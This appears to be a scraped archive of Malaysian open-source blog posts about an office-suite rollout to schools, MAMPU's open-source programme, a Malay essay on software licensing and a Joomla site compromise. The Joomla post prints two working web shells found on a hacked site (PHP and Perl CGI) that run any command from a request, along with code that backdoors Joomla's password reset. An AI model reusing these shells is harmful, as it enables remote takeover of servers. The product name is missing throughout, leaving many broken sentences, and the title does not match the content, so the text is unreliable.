Best Practices For Email Server Setup

Malaysia's Schools Get

Malaysia's schools get

By Victoria Ho, ZDNet Asia


The Malaysian government has unveiled plans to roll out in schools across the nation--a move that will affect some 300,000 PCs.

Announced Wednesday by the chief minister of the state of Terengganu, the initiative will see all 467 schools in the Malaysian state using the open source office suite from January next year.

Some 100 schools in the state are already using, after the first phase of deployment began in January this year, according to a statement from the Malaysian Administrative Modernisation and Management Planning Unit (MAMPU). MAMPU is a government agency that was set up to study the feasibility of implementing open source software in the public sector.

The decision was made based on case studies of other government agencies in the country, which have had successful implementations, Khairil Yusof, a MAMPU spokesperson, told ZDNet Asia in an e-mail interview.

Noting that increased security and knowledge-sharing were some of the positive findings of these case studies, Yusof said: "[The] open source deployments were not affected by viruses. The case studies also highlighted that staff were able to build their skills and knowledge due to the wealth of free information and tutorials associated with open source technologies available on the Internet."

The savings on licensing costs were an added draw for the government's decision to embark on open source deployments. MAMPU said: "Combined, [government agencies] have saved millions of ringgit for licensing fees [with the] expenditure now spent [elsewhere] to provide better public services."

Already an open source supporter
Yusof noted that open source software is not new to Malaysia's government agencies. Melaka, Kedah, Pahang and Sabah have adopted Melaka and Kedah at the forefront having done so since 2003, he said.

Overall, 281 agencies nationwide have adopted open source software, according to MAMPU.

"The migration at the agencies in which MAMPU has assisted, have had positive results," Yusof added, citing successful implementations at the Ministry of Human Resources and Meteorology Department as examples.

"The Ministry of Human Resources has migrated over 2,000 users with very few problem reports To date, over 10,000 seats in over 15 agencies have fully migrated [to open source software]," he said.

He noted that news of the move to has caught some by surprise, because of the lack of fanfare accompanying each deployment.

"Some have been [involved] since 2003 with little information shared [publicly]... [so, it seems as if] suddenly [people] are finding out that entire states are moving [to open source]," Yusof said.


Malaysian Government launches new initiatives for increased Open Source and deployment in public sector and schools

Malaysian Government launches new initiatives for increased Open Source and deployment in public sector and schools

Malaysian Government launches new initiatives for increased Open Source and deployment in public sector and schools

MAMPU Press Release

Malaysian Government launches new initiatives for increased Open Source and deployment in public sector and schools

Chief Minister of Terengganu launches state wide pilot of deployment in schools in conjuction with OSS Accelerated Adoption Seminars. Awards given for best case studies of successful government Open Source projects.

Kuala Terengganu, MALAYSIA. (May 27th 2008) -- Coinciding with the fourth regional OSS Accelerated Adoption Seminar this year, Malaysian Administrative Modernisation and Management Planning Unit (MAMPU), the Ministry of Education and the State Government of Terengganu are launching initiatives for increased adoption of Open Source Software in government and schools.

The OSS Accelerated Adoption Seminars is a national initiative to promote increased awareness and adoption of OSS by government agencies. To encourage knowledge sharing of successful deployments, MAMPU has been providing awards to the best case studies that have been shared from each region. They are provided for categories of IT infrastructure, business applications and desktop applications. To date they have highlighted successful implementations such as the Meterology Department regional network, the desktop implementation for Melaka and statewide deployment of in Kedah. For the East Coast states over a dozen case studies have shown successful Open Source software implementations of e-government applications from Pahang and Terengganu. in Schools Pilot lauched today by the Chief Minister of Terengganu supports the increased adoption of OSS and deployment for the upcoming generation of Malaysians. is an Open Source software alternative for office productivity software. The pilot phase in the state involves deployment to over 100 schools since January 2008.

From January 2009, all 467 schools will start using in the state. It is planned that this will be expanded nationally to over 300,000 PCs in schools. The savings in licensing costs, support for open standards and platform neutrality and increased security from threat of document viruses of this software will provide better delivery of education services by students and teachers.

Seminars highlight accelerated adoption of OSS in public sector

The proven success of Phase I of the governments' Open Source Master Plan has shown that the the adoption of OSS in the government sector in several pilot projects are cost effective and provide better service delivery.

Now in Phase II, the OSS Accelerated Adoption Seminars are an initiative of MAMPU to promote and highlight increased adoption of OSS throughout the public sector. This seminar with over 500 attendees, the final of the year for regional seminars is held in Kuala Terengganu for the states of Pahang, Kelantan and Terengganu. To date over 281 agencies have already adopted OSS for the provision of IT services. This represents a ten-fold increase since original launch of the Master Plan in 2003.

Adoption of the open source office suite, for state government agencies is now official in the states of Melaka, Kedah, Pahang and Sabah. States like Melaka and Kedah have been deploying and OSS since 2003. Most recently Pahang State Government has issued a circular on the states intention for all state agencies to migrate to Combined they have saved millions in ringgit for licensing fees, expenditure now spent locally to provide better public services in their respective states.

In conjunction with the seminars, awards are given to recognise the best case studies of OSS implementations for each region. Highlights for the East Coast include Terengganu State Government Data Centre and e-Government projects all fully utilising open source software. The Terengganu State government has also setup a community training centre that has trained over 20,000 state citizens with IT skills using open source software on 585 Linux desktops.

In Pahang, an online information system for Vetrinary Services developed locally using OSS software has won national awards for innovation. A common finding for the case studies was increased security as OSS deployments of and Desktops were not affected by viruses.

The case studies also highlighted that staff were able to build their skills and knowledge due to the wealth of free information and tutorials associated with the OSS technologies available on the Internet. Furthermore with OSS, these initiatives can be deployed and developed and shared with other agencies without expensive licensing costs further providing avenues for cost savings, skills and knowledge sharing nationally within the public sector.

MOE launches pilot project of deployment in schools

The Ministry of Education with the support of MAMPU and the state government of Terengganu, also launched the pilot project for the deployment of in schools. The pilot starts with the deployment of in over 100 schools in the State of Terengganu. These include both urban and rural schools.

To date most school administrators and staff in the state have already been trained on the use of Over the next 2 years, the Ministry of Education plans to build on this initiative and deploy in over 300,000 PCs in schools throughout the country.

The project is being implemented with the support of the Terenganu State Education Department with commitment and financial support from the State Government of Terengganu through the Implementation Committee chaired by B. En. Ahmad Razif bin Abdul Rahman the director for the Science, Technology and Human Resources Committee for the State of Terengganu. The implementaiton of this project hopes to achieve increased knowledge sharing and innovation for computer users with the optimum license and minimal cost.


Malaysian Administrative Modernisation and Management Planning Unit MAMPU's Open Source Competency Centre is first and single point of reference for support and guidance in the implementation of Open Source Software in the Public Sector. OSS Initiative is a cabinet decision. The Malaysian Administrative Modernization and Management Planning Unit, (MAMPU) was directed to study the feasibility of implementing OSS in the Malaysian Government Agencies.

In response to the directive, MAMPU has prepared a Memorandum entitled "Proposal on OSS Implementation in the Public Sector of Malaysia". The proposal recommendations were tabled by MAMPU and endorsed by the Malaysian Government on 19 June 2002. OSS implementation in the Public Sector will be carried out concurrently with the building of necessary infrastructure such as technical support and human resource reskilling and development. However, changes will be introduced in stages to ensure that there is least disruption to the services offered by the Public Sector and that change is managed well.

About Ministry of Education

The Malaysian Ministry of Education objective is to develop a world-class quality education system which will realise the full potential of the individual and fulfill the aspiration of the Malaysian nation. It oversees all primary and high school education in Malaysia.

About Terengganu State Government

The Terengganu State Government is comprised of the Chief Minister and elected State Assembly which governs the state of Terengganu.

Terengganu is a sultanate and constitutive state of federal Malaysia. The state is also known by its Arabic honorific, Darul Iman ("Abode of Faith"). The coastal city of Kuala Terengganu which stands at the mouth of the broad Terengganu River is both the state and royal capital as well as the largest city in Terengganu.

About provides everything most people need in an office productivity suite. It is stable, reliable, and robust, built up over twenty years' development. It is actively developed, with several releases every year. The main components of the Suite are the Writer wordprocessor; the Calc spreadsheet; Impress for presentations; Draw for graphics; and the Base database. uses the OpenDocument Format OASIS Standard (ISO/IEC 26300) as well as supporting legacy file formats such as Microsoft Office, and is available on major computing platforms in over 80 languages. software is provided under the GNU Lesser General Public Licence (LGPL) and may be used free of charge for any purpose, private or commercial.

Additional Resources

Open Source Case Study Awards

Open Source Case Studies on OSCC Knowledge Bank

Malaysian adoption wiki

Media Contact

contact [21@] oscc . org . my
Ph: 603 8319 1200
Fax: 603 8319 3206

Using Opera Mini Maxis 3G With Nokia E70

I'm posting this blog using opera mini with my Nokia E70. With Maxis 3G to access Internet. Loading website fast and I need to find out how they compress the webpage.

A National Open Source Policy for Malaysia

A National Open Source Policy for Malaysia

I'm still keep the program book (show directory) for LinuxWorld Conference & Expo, Where Open Minds Meet held 11 - 12 May 2004, Hotel Istana, Kuala Lumpur, Malaysia

What interest me is the "A National Open Open Source Policy For Malaysia". It was presented by Afrezal Tahrin, at that time working with MIMOS berhad. Here is the abstract taken from the program book.


A National Open Source Policy for Malaysia

- picture - (Hehehe handsome still "kurus")

Afrezal Tahrin, MIMOS Berhad


Many countries are looking into open source software as a viable alternative for delivering public services and promoting the growth of its software industry. The benefits of Open Source have encouraged many governments to formulate their own National Policy on Open Source.

In 2002 and 2003, MIMOS Berhad and others lobbied the Government of Malaysia for the need for Malaysia to have National Policy on Open Source. As a result, in late 2003, MIMOS Berhad was asked to lead the development of such a policy. Members of the secretariat appointed to co-ordinate this effort will discuss the methodology and progress in drafting the National Open Source Policy for Malaysia.

The presentation will also cover worldwide policy on Open Source and the various approaches taken by Governments to promote the growth of Open Source in their own countries. The presentation will also discuss the Malaysian situation and the suitability of different approaches for Malaysia.


To have the implementation of this policy is my personal agenda now.

I just found this slide from Googling.

"Open Source Policy For Malaysia 14 Apr 2004 MIMOS"

Me And ST WorkShop

I don't see nick capture me replying to an email while we at PICC.

Joomla Bug Day at OSCC MAMPU

Joomla Bug Day at OSCC MAMPU

We spend the whole morning discussing about the Joomla! 1.5.x (5 below) bug. You can read Indhran blog about how we reset the admin password.

Rescue Your Joomla 15x Sites

Related blog post

Then Abdullah our Hightech Rojak Blogger found something in the Apache log.

This command


When we tried it using web brower like Mozilla Firefox. We can list all the files in the directory. I used that link to find the location of the mod_lsys.php file and used cat to view the file. Simply from the Mozilla Firefox.


--------- mod_jsys.php content

Welcome Welcome

chmod("../../modules/mod_jsys/mod_jsys.cgi", 0755);

if(!empty($_REQUEST['cmd'])) {
$buf = shell_exec($_REQUEST['cmd']);
$buf = str_replace("\n", "
\n", $buf);
echo $buf;

if(!empty($_REQUEST['patch'])) {
$fd = fopen("../../components/com_user/models/reset.php", "r");
$fd2 = fopen("../../tmp/p", "w");
if(!$fd) {
echo "Unable to patch";
while($buf = fgets($fd)) {
if(!strpos($buf, "block = 0 AND activation = '.\$db->Quote(")) {
fwrite($fd2, $buf);
else {
fwrite($fd2, 'if($db->Quote($token) == "\'\'") {
fwrite($fd2, ' $db->setQuery(\'SELECT id FROM #__users WHERE block = 0 AND activation = \'.$db->Quote($token));');
$res = rename("../../tmp/p", "../../components/com_user/models/reset.php");
if($res) {
echo "Patched";
else {
echo "Patch failed, unable to copy file";
system("rm -f ../../tmp/p");


---- mod_jsys.cgi content


print "Content-type: text/html\r\n\r\n";

print "Welcome\n";

@cmd = split(/=/, $ENV{'QUERY_STRING'});
$cmd[1] =~ s/%([a-fA-F0-9][a-fA-F0-9])/pack("C", hex($1))/eg;
$cmd = `$cmd[1]`;
$cmd =~ s/\n/\n/g;
print $cmd;

Kemerdekaan dan Perisian Sumber Terbuka OSS

Kemerdekaan dan Perisian Sumber Terbuka (OSS)

Tahun 2008 Malaysia menyambut ulang tahun kemerdekaan yang ke 51. Telah 51 tahun Malaysia membebaskan dirinya daripada pelbagai bentuk penjajahan bermula daripada penjajahan politik dan pentadbiran negara dan kemudiannya ekonomi.

Malaysia berjaya berdiri atas kaki sendiri dan makin yakin terhadap diri kita sendiri.

Dunia ICT kini menjadi peneraju utama dalam ekonomi dunia. Kemajuan yang pesat dan perkembangan teknologi ICT telah mewujudkan satu keadaan kita terlalu bergantung kepada teknologi ICT untuk setiap perkara dalam kehidupan manusia.

Komputer, Internet dan perisian kini menjadi keperluan utama kepada setiap kegiatan manusia. Dimana-mana boleh dilihat komputer digunakan dan hampir 90 peratus dipasang dengan sistem operasi Windows syarikat Microsoft Amerika Syarikat.

Keadaan ini membolehkan syarikat-syarikat besar dalam ICT mewujudkan satu keadaan monopoli. Kita seperti tiada pilihan. Tiada pilihan sehingga dianggap menggunakan perisian tanpa membayar lesen merupakan satu kesalahan jenayah.

Kita sebagai pengguna dan juga kerajaan dipaksa untuk membayar harga pelesenan mencecah berjuta-juta ringgit Malaysia.

Berjuta-juta ringgit yang pengguna komputer Malaysia dan kerajaan Malaysia bayar untuk bayaran perlesenan, hanya mengalir keluar daripada negara Malaysia. Tiada kesan atau faedah yang jelas terhadap kita rakyat Malaysia. Semuanya hanya harga diatas kertas.

Bayangkan sekiranya pembayaran perlesenan dialirkan kepada industri ICT Malaysia, ia boleh menjanakan pelbagai peluang dan tindakan yang boleh menghasilkan pelbagai kesan positif terhadap industri ICT Malaysia.

Bayangkan duit harga perlesenan dialirkan dalam negara boleh digunakan untuk tujuan penyelidikan dan kembangkan kemajuan ICT negara Malaysia.

Bayangkan duit harga perlesenan dialirkan dalam negara boleh digunakan untuk latihan tenaga manusia agar lahir pakar-pakar ICT.

Bayangkan duit harga perlesenan dialirkan dalam negara boleh digunakan untuk mendapatkan sokongan teknikal dan perkhidmatan dalam negara.

Perkara-perkara diatas membolehkan Malaysia tidak terlalu bergantung kepada syarikat-syarikat ICT negara luar dan aliran keluar ringgit Malaysia dapat dikurangkan. Adalah baik duit tersebut digunakan untuk pembangunan sumber manusia bidang ICT yang membolehkan Malaysia bersaing dengan lebih baik lagi.

Malah ada usaha untuk meningkatkan harga perlesenan tanpa memikirkan akibat kepada perbelanjaan kerajaan Malaysia. Kos perlesenan dinaikkan semata-mata untuk keuntungan tanpa rasa perlu ambil berat terhadap keperluan negara Malaysia. Ini adalah kerana syarikat-syarikat ICT ini bukanlah berasal daripada Malaysia.

Penjajahan bentuk baru. Menekan sesebuah negara dengan bayaran perlesenan.

Kita perlu merdekakan diri kita daripada penjajahan ICT ...

Open Source Software (OSS) atau Perisian sumber terbuka mewujudkan satu lagi pilihan kepada Malaysia. Perlesenan bagi perisian sumber terbuka (OSS) adalah percuma. Ia boleh dimiliki tanpa perlu membayar apa-apa kos perlesenan.

Perisian sumber terbuka (OSS) bukan sekadar percuma daripada segi harga perlesenan. Free dalam maksud OSS, bermaksud perisian sumber terbuka, boleh dimuat turun sebanyak mana pun, boleh disalin sebanyak mana pun, boleh dipasang sebanyak mana pun dan boleh disebarkan semula sebanyak mana pun, tanpa sekatan perlesenan.

Lagi membezakan perisian sumber terbuka (OSS) dengan yang lain adalah kod sumber, iaitu bagaimana ia dibangunkan, boleh didapati dan disebarkan. Malah perlesenan sumber terbuka, membolehkan kod-kod sumber tersebut diubah dan dibaiki oleh mana-mana individu dan pihak, dengan syarat perubahan yang dilakukan dikongsikan semula kepada pembangun perisian sumber terbuka (OSS) dan orang ramai dan mengekalkan bentuk asal perlesenan.

Perisian Sumber Terbuka (OSS) mewujudkan keadaan budaya pembangunan yang berlainan daripada cara-cara sebelum ini. Pembangunan perisian sumber terbuka (OSS) boleh dilakukan secara bersama, melalui Internet tanpa perlu para pembangunnya duduk dalam satu tempat. Ia turut mewujudkan apa yang dikatakan usaha gotong royong, kerja sama antara para pembangun perisian daripada pelbagai pelusuk dunia saling menyumbang menghasilkan perisian sumber terbuka (OSS).

Gotong royong ini membolehkan perisian sumber terbuka (OSS) dibangunkan menggunakan hasil pengalaman dan pengetahuan pakar-pakar serata dunia, mewujudkan kawalan mutu yang tinggi dan sistem pertolongan dalam talian dalam pelbagai cara komunikasi Internet sama ada Email, IRC, Forum, blog dan pelbagai lagi.

Kekuatan gotong royong ini menghasilkan sistem operasi Linux, Desktop Gnome dan KDE dan yang mampu malah telah menggugatkan pelbagai perisian lesen berbayar.

Keterangan lanjut mengenai Open Source Software di

Pada 19 Jun 2002, Kerajaan Malaysia telah mengambil keputusan untuk menggalakkan penggunaan aplikasi sumber terbuka (OSS) dalam sektor awam. The Malaysian Administrative Modernisation and Management Planning Unit (MAMPU) Jabatan Perdana Menteri telah dimandatkan untuk mengetuai dan melaksanakan OSS dalam sektor awam.

Pada 16 Julai 2004, Malaysian Public Sektor OSS Master Plan (OSS Master Plan) telah dikeluarkan sejajar dengan pelancaran Open Source Competency Centre (OSCC) MAMPU.

Baca lanjut mengenai OSS Master Plan dan OSCC MAMPU di

Sama ada pihak kerajaan atau rakyat Malaysia, kita perlu mempunyai pilihan dan pilihan itu adalah perisian sumber terbuka (OSS). Pilihan-pilihan dalam industri ICT akan memastikan kita tidak dijajah melalui kuasa monopoli ekonomi dan teknologi.

Kita bukan sahaja hanya menggunakan perisian sumber terbuka (OSS), malah kita perlu budayakan cara pembangunan OSS dalam dunia ICT Malaysia. Sama-sama gotong royong membangunkan perisian sumber terbuka (OSS) sama ada oleh kita dan untuk kita. Atau sama-sama menyumbang dengan masyarakat antarabangsa, menaikkan nama Malaysia di mata dunia dalam bidang ICT dan perisian sumber terbuka (OSS).

Anda boleh mula menyumbang dengan menyertai dan menyumbang di Knowledge Bank OSCC MAMPU

OSCC MAMPU turut keluarkan perisian Mymeeting dengan perlesenan OSS. Ini membolehkan orang ramai terlibat dalam pembangunan perisian MyMeeting. Sila lawat laman web

Kita perlu merdeka daripada penjajahan ICT.

Senarai aplikasi OSS yang boleh digunakan

Artikel sebelum ini

Virtualization Gabungkan Pelbagai Sistem Operasi

Netika Dunia Internet

Aplikasi Percuma dan Sumber Terbuka untuk Vista

Laman penulis

Bagi kemas kini terbaru anda dijemput untuk sertai senarai terhad email di atau email kepada

[email protected]

Pelbagai artikel, nota komputer dan Internet untuk Malaysia di


Harisfazillah Jamel linuxmalaysia hafnie hafija

Bukan Sekadar Internet Sahaja Nantikan kehadiran buku ini dipasaran...

18 Ogos 2008

Bukan Sekadar Internet Sahaja

This work is licensed under the Creative Commons Attribution-NonCommercial-ShareAlike 2.5 Malaysia License. To view a copy of this license, visit or send a letter to Creative Commons, 543 Howard Street, 5th Floor, San Francisco, California, 94105, USA.

When In Doubt Create Your Own CMS Called CmsForNerd

When In Doubt Create Your Own CMS

One of our websites that we manage was defaced. This is due to Jomlaa version 1.5.5 and all Jomlaa previous version 1.5, admin password can be reset by other user.

You can read it here.

It's took us sometime to figure out what happening until Gcert MAMPU alert us the particular bug. We assumed it's just another 3rd party modules given us the problem. haiyaaaa....

Yes. I have my own CMS (Content Management System) called CmsForNerd.


Pelaksanaan OSS Di Agensi-agensi Kerajaan Malaysia

Pelaksanaan OSS Di Agensi-agensi Kerajaan Malaysia

Saya ingin kongsikan bersama rakan-rakan yang lain.

Surat Pekeliling YB. Setiausaha Kerajaan Pahang Bil. 01 Tahun 2008
Perlaksanaan Penggunaan Perisian OpenOffice.Org Di Semua Agensi dan Pentadbiran Negeri


Golden Touch How An Employee Saved MAS RM70Mil

Golden Touch How An Employee Saved MAS RM70Mil

Quote from InTech The Star Tueday 5 August 2008


A Malaysian Airline System Bhd employee spent many a night burning the midnight oil to design a database solution that rivals commercial systems.

And in doing so, Sharul Isahak said he saved the high-flying company RM70mil.


Alternative solution

Designing E-Promis was not a simple affair because Sharul had to look for the cheapest means possible to create the software.

“This meant looking at open-source solutions. Instead of platforms such as Microsoft or Sun, we chose LAMP (Linux, Apache, MySQL and PHP),” he said.

Plus, E-Promis is a web-based system, which makes it easily accessible from any terminal.

Sharul is the sole programmer and architect of the software but what is even more impressive is that he had zero knowledge of programming.

“I started from scratch. It took me countless hours doing research on programming. I really pushed myself to the limit," he said.


The golden boy of MAS

MAS Blog about E-Promis

MyMeeting 2.0 RC1 Release

MyMeeting Version 2.0 RC 1 Release

MyMeeting is a web application specifically designed to help you to better manage your meetings decision and get more out of them. Initially developed at the Open Source Competency Center (OSCC) MAMPU Malaysia, it is the Malaysian governments' first fully open source software.

This release is for public review and feedback.

Feedback, bugs reports, issues and comments

Backup site

Estimated cost for MyMeeting 2.0

$ 1,815,478

VIP Very Important Programmer PHP Programming Contest 2008

VIP (Very Important Programmer) PHP Programming Contest 2008


VIP (Very Important Programmer) PHP programming contest is organized by K-Ekonomi Melaka, clollaboration with Art In Software Sdn Bhd. This event has good opportunity to expose programming culture to everyone that involved. The event will be held on 23rd - 24th August 2008. On 23rd (Sat), interested talks will be given related to Information Technology starting from 11 a.m till 4.30 p.m.


Programming contest is well known among computer users either in international level or local region. This programming contest's aim is to show our local programmer talents and open opportunity for them. It will increase their knowledge and upgrading their level in programming skills. As this content is open to everyone, this event will be a big attraction for companies or individual.

  • To give a good exposure and awareness to all participants and visitors about the needs of skills in programming.
  • To improve their skill in programming especially in PHP.
  • To introduce the technology to participants and visitors.
  • To give opportunity to Companies/Goverment Sectors/Individual to find potential candidates as employees.
  • To gather and create a good networking for all PHP community
For More Information

Stop software "piracy", support Open Source !

Stop software "piracy", support Open Source !

I want to share Dag blog post about software privacy.

De Standaard is once again helping the BSA and Microsoft with their scare tactics, so let me give some counter-weight...

Is commercial software too expensive or "piracy" against your ethics ? Afraid of the BSA raiding your home or business ? Start using Open Source software ! For everything you do, a free ('no strings attached') Open Source alternative exists. And you can still pay someone, if you want to :-)


Related to this. I had attend "persidangan Ketua Pegawai Maklumat" CIO, Untuk Sektor Awam 2008

and found this "PEKELILING KONTRAK PERBENDAHARAAN BIL. 3 TAHUN 2008" in OSCC MAMPU booth with others exhibitiors materials, that can be view here

so I need to ask my OSCC friends, where did they get it but I can assume. For Malaysian Agencies, they alway have OSCC MAMPU for Open Source Software.

Stop software "piracy", support Open Source !

ps. The amount in US dolar. :(

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